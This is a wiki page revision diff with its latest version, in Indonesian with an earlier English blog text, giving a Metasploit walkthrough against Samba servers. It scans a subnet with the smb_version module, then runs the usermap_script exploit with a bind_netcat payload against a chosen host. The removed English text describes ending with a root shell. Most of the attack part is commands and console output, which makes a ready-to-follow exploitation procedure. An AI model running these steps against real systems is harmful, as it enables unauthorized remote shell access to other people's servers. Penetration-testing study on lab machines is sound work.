Difference between revisions of "Kali Linux: Membobol Network Neighbourhood / SAMBA"

From OnnoWiki
Jump to navigation Jump to search
(New page: Sumber: http://www.elithecomputerguy.com/2013/01/22/hacking-samba-smb-servers-in-metasploit/ Today, I am going to show you how to exploit an out of date SAMBA server I have running her...)
 
 
(6 intermediate revisions by the same user not shown)
Line 4: Line 4:
  
  
Today, I am going to show you how to exploit an out of date SAMBA server I have running here for demo purposes. Now if you aren’t familiar with network enumeration I have a blog on how to use the Basics of Nmap to get you started. Instead of using Nmap though, I am going to be using a module within Metasploit called SMBScan.
+
==Jalankan msfconsole==
  
This will scan multiple hosts to try and fingerprint a SAMBA Server / SMB Shares on the network. Before we can run this module we need to start up msfconsole, to do this simply open up terminal  type “msfconsole” without quotes and press enter. It may take a few minutes for Metasploit to load all the available exploits, modules and payloads. Once Metasploit is finished, let’s type some commands.
+
Ketik di console
  
type “use auxiliary/scanner/smb/smb_version” without quotes and press enter.
+
msfconsole
  
smbscan
+
Akan keluar kira-kira
  
You should get a prompt similar to the one above now type “show options” without quotes, this is going to bring up all the different options that can be used with this particular scanner. However, for future reference the show options command works with any module you are trying to use within the framework. (See Screen Shot Below)
+
  Metasploit Park, System Security Interface
 +
  Version 4.0.5, Alpha E
 +
  Ready...
 +
  > access security
 +
  access: PERMISSION DENIED.
 +
  > access security grid
 +
  access: PERMISSION DENIED.
 +
  > access main security grid
 +
  access: PERMISSION DENIED....and...
 +
  YOU DIDN'T SAY THE MAGIC WORD!
 +
  YOU DIDN'T SAY THE MAGIC WORD!
 +
  YOU DIDN'T SAY THE MAGIC WORD!
 +
  YOU DIDN'T SAY THE MAGIC WORD!
 +
  YOU DIDN'T SAY THE MAGIC WORD!
 +
  YOU DIDN'T SAY THE MAGIC WORD!
 +
  YOU DIDN'T SAY THE MAGIC WORD!
 +
 +
 +
Easy phishing: Set up email templates, landing pages and listeners
 +
in Metasploit Pro -- learn more on http://rapid7.com/metasploit
 +
 +
        =[ metasploit v4.11.4-2015071403                  ]
 +
+ -- --=[ 1467 exploits - 840 auxiliary - 232 post        ]
 +
+ -- --=[ 432 payloads - 37 encoders - 8 nops            ]
 +
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
  
show options
 
  
Now for the SMB version scanning tool it tells you under the show options what parameters must be fulfilled before running the tool. RHOSTS(Remote Hosts) is required to be set, and the number of THREADS also needs to be set. So lets go ahead and do that type: ”set RHOSTS 192.168.1.0/24” without quotations, this sets the RHOSTS to the IP range we are trying to find the SAMBA server on. Now we need to set our THREADS, and THREADS is just the amount of times it will go through and do a scan.
+
yang lebih sopan, KETIK
  
type: “set THREADS 75” without quotes and press enter. After you have set these parameters you will see something similar to below:
+
msfconsole thankyou
  
setthreads
+
Akan keluar
  
Now that we have specified all the necessary parameters, all we need to do is type “run” without quotes and Metasploit will begin running our scan on the network. And for this blog I have setup an un-patched SAMBA server to own.
 
  
scanresults
 
  
As you can see the SMB scanner found a host running Samba server version 3.0.20. Now all we need to do is do a quick Google search for Samba 3.0.20 exploits. Take note of the host IP address in this case 192.168.1.13 we will need this later.
+
      ,          ,
 +
    /            \
 +
    ((__---,,,---__))
 +
      (_) O O (_)_________
 +
          \ _ /            |\
 +
          o_o \  M S F  | \
 +
                \  _____  |  *
 +
                |||  WW|||
 +
                |||    |||
 +
 +
 +
Validate lots of vulnerabilities to demonstrate exposure
 +
with Metasploit Pro -- Learn more on http://rapid7.com/metasploit
 +
 +
        =[ metasploit v4.11.4-2015071403                  ]
 +
+ -- --=[ 1467 exploits - 840 auxiliary - 232 post        ]
 +
+ -- --=[ 432 payloads - 37 encoders - 8 nops            ]
 +
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
  
search
+
==Lakukan enumerasi==
  
We found several results this one just happens to be on the Metasploit website itself. So it looks like there is a “command execution vulnerability in Samba,”  and it also gives the module that will be used to exploit our host and deliver a payload, it’s called “username map script” Now back at our console we are going to type: “use exploit/multi/samba/usermap_script” without quotes and press enter.
 
  
Now just like with the SMBScanner we can use the show options command to see what parameters must be set before using this exploit module so let’s go ahead and do that. (See Below).
+
KETIK
  
showoptions
+
use auxiliary/scanner/smb/smb_version
 +
show options
  
We can see from the show options command that both RHOST (Remote Host) and RPORT (Remote Port) both need to be set before running this exploit. Go ahead and type “set RHOST 192.168.1.13” without quotes. We don’t need to set the RPORT in this case because as you can see in the screen shot it’s current settings are set to 139. Now once you have set all the parameters required to run the exploit, simply type: “exploit” without quotes and Metasploit will begin attacking our SAMBA server.
+
Keluar
  
exploit
+
    Name      Current Setting  Required  Description
 +
    ----      ---------------  --------  -----------
 +
    RHOSTS                      yes      The target address range or CIDR identifier
 +
    SMBDomain  WORKGROUP        no        The Windows domain to use for authentication
 +
    SMBPass                    no        The password for the specified username
 +
    SMBUser                    no        The username to authenticate as
 +
    THREADS    1                yes      The number of concurrent threads
  
And like magic we have a command shell! Meaning we are in the SAMBA server itself, if we type “ls” without quotes this will list the directory, with this exploit we are in the root folder. Now just to be 100% sure we owned this box, I want you to type “whoami” without quotes and you can see below for yourself the server responded with “root” Good Game Samba Box!
+
KETIK
  
whoami
+
set RHOSTS 192.168.0.0/24
 +
set THREADS 75
 +
run
  
This concludes the owning Samba Servers blog, I will have more introduction blogs coming soon on the Metasploit framework so stay tuned!
+
Hasilnya
  
 +
[*] 192.168.0.7:445 could not be identified: Unix (Samba 3.6.3-31a.osstech)
 +
[*] Scanned  44 of 256 hosts (17% complete)
 +
[*] Scanned  68 of 256 hosts (26% complete)
 +
[*] Scanned  78 of 256 hosts (30% complete)
 +
[*] 192.168.0.90:445 is running Windows 7 Professional SP1 (build:7601) (name:HP-PC) (domain:WORKGROUP)
 +
[*] Scanned 152 of 256 hosts (59% complete)
 +
[*] Scanned 153 of 256 hosts (59% complete)
 +
[*] 192.168.0.221:445 could not be identified: Unix (Samba 3.0.37)
 +
[*] Scanned 156 of 256 hosts (60% complete)
 +
[*] Scanned 205 of 256 hosts (80% complete)
 +
[*] Scanned 227 of 256 hosts (88% complete)
 +
[*] Scanned 231 of 256 hosts (90% complete)
 +
[*] Scanned 256 of 256 hosts (100% complete)
 +
[*] Auxiliary module execution completed
  
 +
==exploit==
  
  
 +
KETIK
  
 +
use exploit/multi/samba/usermap_script
 +
show options
 +
 +
Keluar
 +
 +
Module options (exploit/multi/samba/usermap_script):
 +
 +
    Name  Current Setting  Required  Description
 +
    ----  ---------------  --------  -----------
 +
    RHOST                  yes      The target address
 +
    RPORT  139              yes      The target port
 +
 
 +
 +
Exploit target:
 +
 +
    Id  Name
 +
    --  ----
 +
    0  Automatic
 +
 +
 +
KETIK
 +
 +
set RHOST 192.168.0.7
 +
set payload cmd/unix/bind_netcat
 +
exploit
 +
 +
 +
Jika sudah selesai
 +
 +
quit
  
 
==Referensi==
 
==Referensi==
  
 
* http://www.elithecomputerguy.com/2013/01/22/hacking-samba-smb-servers-in-metasploit/
 
* http://www.elithecomputerguy.com/2013/01/22/hacking-samba-smb-servers-in-metasploit/
 +
* http://infosecninja.blogspot.co.id/2013/07/penetration-testing-samba-server.html
 +
* http://www.wikisecure.net/smbmap-map-smb-shares/

Latest revision as of 08:24, 15 February 2016

Sumber: http://www.elithecomputerguy.com/2013/01/22/hacking-samba-smb-servers-in-metasploit/



Jalankan msfconsole

Ketik di console

msfconsole

Akan keluar kira-kira

  Metasploit Park, System Security Interface
  Version 4.0.5, Alpha E
  Ready...
  > access security
  access: PERMISSION DENIED.
  > access security grid
  access: PERMISSION DENIED.
  > access main security grid
  access: PERMISSION DENIED....and...
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!


Easy phishing: Set up email templates, landing pages and listeners
in Metasploit Pro -- learn more on http://rapid7.com/metasploit 

       =[ metasploit v4.11.4-2015071403                   ]
+ -- --=[ 1467 exploits - 840 auxiliary - 232 post        ]
+ -- --=[ 432 payloads - 37 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ] 


yang lebih sopan, KETIK

msfconsole thankyou

Akan keluar


     ,           ,
    /             \
   ((__---,,,---__))
      (_) O O (_)_________
         \ _ /            |\
          o_o \   M S F   | \
               \   _____  |  *
                |||   WW|||
                |||     ||| 


Validate lots of vulnerabilities to demonstrate exposure
with Metasploit Pro -- Learn more on http://rapid7.com/metasploit 

       =[ metasploit v4.11.4-2015071403                   ]
+ -- --=[ 1467 exploits - 840 auxiliary - 232 post        ]
+ -- --=[ 432 payloads - 37 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

Lakukan enumerasi

KETIK

use auxiliary/scanner/smb/smb_version
show options

Keluar

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOSTS                      yes       The target address range or CIDR identifier
   SMBDomain  WORKGROUP        no        The Windows domain to use for authentication
   SMBPass                     no        The password for the specified username
   SMBUser                     no        The username to authenticate as
   THREADS    1                yes       The number of concurrent threads

KETIK

set RHOSTS 192.168.0.0/24
set THREADS 75
run

Hasilnya

[*] 192.168.0.7:445 could not be identified: Unix (Samba 3.6.3-31a.osstech)
[*] Scanned  44 of 256 hosts (17% complete)
[*] Scanned  68 of 256 hosts (26% complete)
[*] Scanned  78 of 256 hosts (30% complete)
[*] 192.168.0.90:445 is running Windows 7 Professional SP1 (build:7601) (name:HP-PC) (domain:WORKGROUP)
[*] Scanned 152 of 256 hosts (59% complete)
[*] Scanned 153 of 256 hosts (59% complete)
[*] 192.168.0.221:445 could not be identified: Unix (Samba 3.0.37)
[*] Scanned 156 of 256 hosts (60% complete)
[*] Scanned 205 of 256 hosts (80% complete)
[*] Scanned 227 of 256 hosts (88% complete)
[*] Scanned 231 of 256 hosts (90% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed

exploit

KETIK

use exploit/multi/samba/usermap_script
show options

Keluar

Module options (exploit/multi/samba/usermap_script):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  139              yes       The target port
 

Exploit target:

   Id  Name
   --  ----
   0   Automatic


KETIK

set RHOST 192.168.0.7
set payload cmd/unix/bind_netcat
exploit


Jika sudah selesai

quit

Referensi